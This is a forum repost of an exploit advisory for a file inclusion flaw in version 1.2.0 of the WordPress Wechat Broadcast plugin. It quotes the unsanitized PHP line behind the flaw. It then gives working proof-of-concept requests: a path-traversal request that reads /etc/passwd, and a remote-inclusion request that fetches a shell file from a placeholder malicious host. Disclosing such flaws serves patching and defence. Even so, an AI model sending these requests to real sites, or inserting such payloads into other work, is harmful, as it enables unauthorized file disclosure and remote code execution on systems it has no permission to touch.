WordPress Wechat Broadcast 1.2.0 Local File Inclusion

#207
Topic created · 1 Posts · 0 Views
  • WordPress Wechat Broadcast plugin version 1.2.0 suffers from a local file inclusion vulnerability.
    MD5 | 96c6e22ef7a8508c4c0907ada9779757
    Download

    # Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion  
    # Author: Manuel Garcia Cardenas  
    # Date: 2018-09-19  
    # Software link: https://es.wordpress.org/plugins/wechat-broadcast/  
    # CVE: N/A  
    # Description  
    # This bug was found in the file: /wechat-broadcast/wechat/Image.php  
    # echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');  
    # The parameter "url" it is not sanitized allowing include local or remote files  
    # To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol   
    # to interact with the application.  
    # PoC  
    # The following URL have been confirmed that is vulnerable to local and remote file inclusion.  
    GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd  
    # Remote File Inclusion POC:  
    GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt  
    

    Source: packetstormsecurity.com

Log in to reply